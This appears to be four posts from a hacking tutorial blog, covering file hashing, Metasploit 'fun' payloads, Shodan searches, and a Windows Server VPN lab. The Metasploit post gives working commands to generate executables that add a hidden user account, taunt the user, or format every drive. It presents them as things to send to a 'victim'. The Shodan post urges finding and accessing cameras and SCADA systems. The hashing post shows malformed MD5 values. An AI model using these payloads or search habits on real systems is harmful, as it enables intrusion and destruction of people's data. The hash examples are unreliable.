In practice, a hash function will always produce a value of the same size, for instance md5 () is will always return 128bits no matter the size of the input. This makes a 1 to 1 relationship impossible. A cryptographic hash function takes extra precautions in making it difficult to produce 2 different inputs with the same output, this is called a collision. It also makes it difficult to reverse the function. Hash functions are used for password storage because if an attacker where to obtain the password’s hash then it forces the attacker to break the hash before he can use it to login. To break hashes, attackers will take a word list or an English dictionary and find all of the corresponding hash values and then iterate though the list for each password looking for a match.

md5 (), sha0 and sha1 () are all vulnerable to a hash collision attacks and should never be used for anything security related. Instead any member of the sha-2 family, such as sha-256 should be used.

To calculate Hash Value, we will use Hash Calculator. Install Hash Calculator from –> http://www.slavasoft.com/hashcalc/

Hash function plays major role in hacking/forensic world because it helps us to know whether a particular file has changed or not. You can also calculate hash value of your computer and know if anyone has made any kind of changes.

To calculate hash value open Hash Calculator.

Now browse the file of which you want to calculate the hash value. And click on Calculate.

After clicking on calculate it will give too hash values using four different hashing algorithms i.e MD5, SHA1, RIPEMD160, CRC32. You can check other boxes too if you want to use those algorithms to calculate hash value.

This way Hash calculator helps us to know the hash value. Now if there are any changes made in this file, the hash value will change too.

Once I calculated the hash value above i made some changes in the file and calculated the hash value again with the same method and as a result the hash value was changed.

Now, we have two hash values. Let us compare both of these values of MD5. The value of first file is 1110808875326e25dl93e4ee096afaf1 and the value of other file is fb9d53883f302d78c978a583e8a85.

Seeing these two values of MD5 of the same file we can conclude that some changes are made. Because even slightest difference will change the hash value.

But now the main question is how to detect this change because a file can be of 1TB too. Also imagine that you are sending a harddisk full of important documents to someone and there is a huge possibility that someone can bribe the sender and make changes in your documents. So how can you detect these changes?

The answer is very simple –> Compare it! This tool helps us achieve our goal which is to detect the change.

Download Compare it! From —>http://www.grigsoft.com/wincmp3.htm

Open Compare it!

Click file and a drop menu will appear. Select compare files option.

A Dialogue box will open which will ask you to choose the files that you want to compare. Click on Browse button and select your file. And click on Open.

It will show you the changes by highlighting them with green color and the red color will tell the exact change as shown below:

So, in such way you can protect your sensitive data and detect the crime done too.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Understand Hashing in Cryptography (A Practical Approach) appeared first on Hacking Articles.

Ordinarily small things have no use but whenever it comes up to their greater relevance then at certain point of time it has a universalized impact and can create a complex situation. And this article is about some simple payloads that can help us to muddle with our victim. Hence, leaving a mark behind.

Moreover metasploit is not about hacking but it’s also about hacking in style. There are a lot of payloads that are too good to not to use. These payloads are like small droplets in an ocean but still they matter and there are only handful of people who about these payloads. Also so far we have only learnt about hardcore metasploit but let’s see what more cools things it has to show us.

Add User

Moving forward, let us learn how to make such payloads, open metasploit and use windows/adduser payload. This payload lets you create another user in your victim’s PC. The commands are:

use windows/adduser

set user raaz

set pass Ignite@123

set wmic true

generate -t exe -f /root/Desktop/user.exe

With the execution of above command, a new user will be created in your victim’s PC. And you can go to the shell of your victim’s PC and see the result. And to see the user’s type:

net user

Message Box

Another payload is windows/messagebox. This payload makes a pop-up message appear on victim’s PC. The message can be anything you want along with title. To create this payload again open metasploit and use windows/messagebox. The commands are:

use windows/messagebox

set text you have been hacked

set tittle Important Message

generate -t exe -f /root/Desktop/message.exe

And your payload is created. When you will send it and once the victim will open it then a pop-up message box will appear displaying your message like the following one:

Format All Drives

Our next payload is windows/format_all_drives. This payload formats any desired drive. The commands to create this payload are :

use windows/format_all_drives

set vlomelabel 3

generate -t exe -f /root/Desktop/format.exe

When the payload is sent and opened, it formats their drive.

Speak

Another such payload is speak_pwned. This payload is a one-line command payload which creates an audio saying “you have been pawned” and now when the victim will open it then this audio will be played for him/her. And it’s command is :

generate -t exe -f /root/Desktop/speak.exe

So that is how you can use different payloads to mess with your victim. Also you can create this payload and keep it safe with you so that you can use it whenever you want. And please note that all these payloads are post payloads to make these work you need to first hack your victim.

This way even the smaller things will make a difference; after all even a pawn can kill the king. And most importantly, once you are done with your victim you can leave him/her a souvenir.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Fun with Metasploit Payloads appeared first on Hacking Articles.

Many people have described Shodan as a search engine for hackers, and have even called it “the world’s most dangerous search engine”. It was developed by John Matherly in 2009, and unlike other search engines, it looks for specific information that can be invaluable to hackers. John Matherly is an Inernet Cartographer, hence the shodan.

Shodan is a type of search engine that allows users to search for Internet-connected devices and explicit website information such as the type of software running on a particular system and local anonymous FTP servers. Shodan can be used much in the same way as Google, but indexes information based on banner content, which is meta-data that servers send back to hosting clients. For the best results, Shodan searches should be executed using a series of filters in a string format.

So in conclusion we can say that, Shodan is a search engine for finding specific devices, and device types, that exist online. It is like an internet map that lets us see which device is connected to which or ports are open on a specific device or what operating system a certain system is using, etc. Rather than to locate specific content on a particular search term, SHODAN is designed to help the user find specific nodes (desktops, servers, routers, switches, etc.) with specific content in their banners.

What Shodan can do?

Shodan pulls service banners from servers and devices on the web, mostly port 80, but also ports 21 (ftp), 22 (SSH), 23 (telnet), 161 (SNMP), and 5060 (SIP). Since almost every new device now has a web interface (maybe even your refrigerator) to ease remote management, we can access innumerable web-enabled servers, network devices, home security systems, etc. Shodan can find us webcams, traffic signals, video projectors, routers, home heating systems, and SCADA systems that, for instance, control nuclear power plants and electrical grids. If it has a web interface, Shodan can find it! Although many of these systems communicate over port 80 using HTTP, many use telnet or other protocols over other ports. Keep that in mind when trying to connect to them.

How to use Shodan?

Understanding shodan is very important at first you might find it complex but once yu get to know it you will find it very handy in use and  very resourcefull too. So, now let us learn how to work with fasinating search engine. To use shodan to your advantage you have

Follow the steps to register. After registration a link will be sent to your e-mail ID for your activation of account on Shodan. Once your account is activated login to Shodan and now that you are logged in you are free to search anything.

Here are some examples for which you can use shodan to search up the things you want.

Webcam

When you search for webcam, it will show you all the webcam present in the world. It will show the results as shown in the image below :

Traffic Signals

Searching about traffic signals or traffic signals camera then it will show you all the traffic surveillance camera present.

Cisco

Searching about cisco will show you all the cisco routers in the world but you can search them by country. Like, here, i have found cisco routers in India and result is below image :

Scada

You can also search about Scada and you will get its information around the whole world as shown :

netcam

Shodan can also show you about all the netcams in world and you can access them too with your hacking skills.

GPS

Shodan even lets you find all the GPS devices all over the world and for this you just have to type gps in the search box.

Port

Not only the devices but it can help find which port is open in which device. For example I have here searched port : 1723. Now we all know this port is used for VPN so through this we can know which device is using VPN as shown in image below :

When you search for port : 3389 it will show the operating system used by the device too which can be very useful.

This is how Shodan is useful for hackers as it gives all the information necessary to collect that too all over the world. And so you can manipulate this information as you desire.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Shodan a Search Engine for Hackers (Beginner Tutorial) appeared first on Hacking Articles.

You just need to follow the basic steps for configuring a remote access virtual private network (VPN) server using Server Manager, the Add Roles Wizard, and the Routing and Remote Access Server Setup Wizard. After you finish configuring a basic remote access VPN server, you can perform additional configuration tasks on client depending on the way you want to use the remote access VPN server.

Start -> Administrative Tools -> Server Manager. Click Add Roles

This wizard helps you install roll on your server, click on next to continue

Check the status of “Network Policy Server” under Role Services and click on next.

Read the requirements and click “Next” to continue.

On the following screen “Select Role Services” for Network Policy and Access Service, place a check mark on Routing and Remote Access Services and make sure “Remote Access Service” and “Routing” are selected as well. Click next to continue.

To install following role services for Network Policy and Access Service click on Install.

This show the summary of Remote Access services and Routing were installed successfully. Once the installation finishes, click close to end the wizard.

Till here I have completed installation of VPN in server.

To complete configuration in Routing and Remote Access follow these step.

Start -> Administrative Tools ->Routing and Remote Access

In the console that opens, right click your server name and right click on “Configure and Enable Routing and Remote Access “this configures Routing and Remote Access on the selected server.

In the Wizard you can enable any of following combinations of services. I will choose Custom Configuration for my server and click on Next.

Next is Routing and Remote Access server setup wizard in which I am going to decide which type of access should be allows to client to access server network.

You can configure the selected services in the Routing and Remote Access console. I am selecting the Check Box VPN access service on this server and click on next to continue

Now you have successfully completed the task of VPN access service in your server, to close this wizard click on finish.

Now you will get the dialog box which shows message that Routing and Remote Access service is ready to use. So click on Start Service.

Once the process is finished, and you are back on the main Server Manager window, routing and remote access should now be up and running.

Once you have successfully configuration of Routing and Remote, the administrator will select the desire user and give privilege to access the server through VPN connection for connecting client from different location.

Start -> Administrative Tools -> Active Directory Users and Computers -> Right Click the properties of an user

Click on the Dial-In tab and under “Network Access Permission” select Allow Access. Click on Apply and Ok to finish. Only selected client will be able to connect with server network through VPN using different network.

This was first phase of VPN configuration on server-side performs by administrator.

SETUP VPN CONNECTION FOR CLIENT ON WINDOWS 7

 Setting up a client connection to a VPN network is very similar to setting up an old-fashioned Dial-Up connection through a phone line. You need to enter a server address (hostname or IP), user and password. Once connected, this system will receive an IP address within the VPN network, so you’ll be able to access it from any other machines also connected to the same VPN network.

Click on the Start -> Control Panel ->Network and Internet -> Network and Sharing Center

Change your network settings click on setup a new connection or network option, this contains different types of network connection options like broadband, dial-up, VPN or set up a router or access point.

Here you can many other options as I told, I will choose connect to a workplace to set a dial-up or VPN connections to your workplace. This option will set the connection to a workplace or say to our server for the client.

Now you will see next wizard for connect to workplace, which will ask for type of connection through which you will connect to your workplace or server.

My option will be use my internet connection (VPN) and the will be established using internet.

Now connecting network you must aware of IP address of workplace or say server. 192.168.0.106 it is the IP of my windows server 2008 r2 having VPN setup and configuration ,so I have mention this IP in Internet Address for connection

Now I had set privilege for user pentest to Allow Access for VPN connection. When you will try to connect it will ask for your credentials for authentication. Client will enter his username and password for establishing connection and click on connect.

When given credential will be found authorized, it will allow client to connect with workplace and provide VPN connection.

This is unshared and secure connection over internet between client and server for sharing data in a transparent medium.

To ensure that you have successful VPN connection open your command promot and type ipconfig this show another IP over LAN.

My IP is 192.168.0.104 under PPP adapter VPN connection, which will be used for login in server to access network and share data, as I am also having my LAN IP 192.168.0.105. This shows my VPN connection is established successfully.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets.

The post Setup VPN Penetration Testing Lab in Server 2008 appeared first on Hacking Articles.